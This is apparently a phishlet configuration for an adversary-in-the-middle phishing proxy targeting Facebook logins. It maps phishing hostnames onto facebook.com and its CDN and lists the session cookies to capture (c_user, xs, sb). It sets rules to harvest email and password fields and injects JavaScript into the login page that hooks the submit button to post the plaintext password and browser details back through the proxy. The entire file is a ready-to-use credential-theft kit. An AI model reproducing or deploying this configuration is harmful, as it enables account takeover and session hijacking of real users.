author: '@charlesbel' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} - {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} sub_filters: - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} auth_tokens: - domain: '.facebook.com' keys: ['c_user','xs','sb'] credentials: username: key: 'email' search: '(.*)' type: 'post' password: key: 'unenc_password' search: '(.*)' type: 'post' custom: - key: 'pass' search: '(.*)' type: 'post' - key: 'Password' search: '(.*)' type: 'post' - key: 'UserAgent' search: '(.*)' type: 'post' - key: 'Browser' search: '(.*)' type: 'post' - key: 'Engine' search: '(.*)' type: 'post' - key: 'Platform' search: '(.*)' type: 'post' login: domain: 'www.facebook.com' path: '/login.php' js_inject: - trigger_domains: ["www.facebook.com"] trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"] trigger_params: [] script: | function onclickListener(){ var submit = document.querySelectorAll('button[type=submit]')[0]; submit.setAttribute("onclick", "sendPass()"); var useragent = navigator.userAgent; xhr.open("POST", '/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("UserAgent="+encodeURIComponent(useragent)); var browser = navigator.appName; xhr.open("POST", '/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("Browser="+encodeURIComponent(browser)); var engine = navigator.product; xhr.open("POST", '/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("Engine="+encodeURIComponent(engine)); var platform = navigator.platform; var xhr = new XMLHttpRequest(); xhr.open("POST", '/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("Platform="+encodeURIComponent(platform)); return; } function sendPass(){ var password = document.getElementsByName("pass")[0].value; var xhr = new XMLHttpRequest(); xhr.open("POST", '/login/device-based/regular/login/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("unenc_password="+encodeURIComponent(password)); return; } setTimeout(function(){ onclickListener(); }, 1000);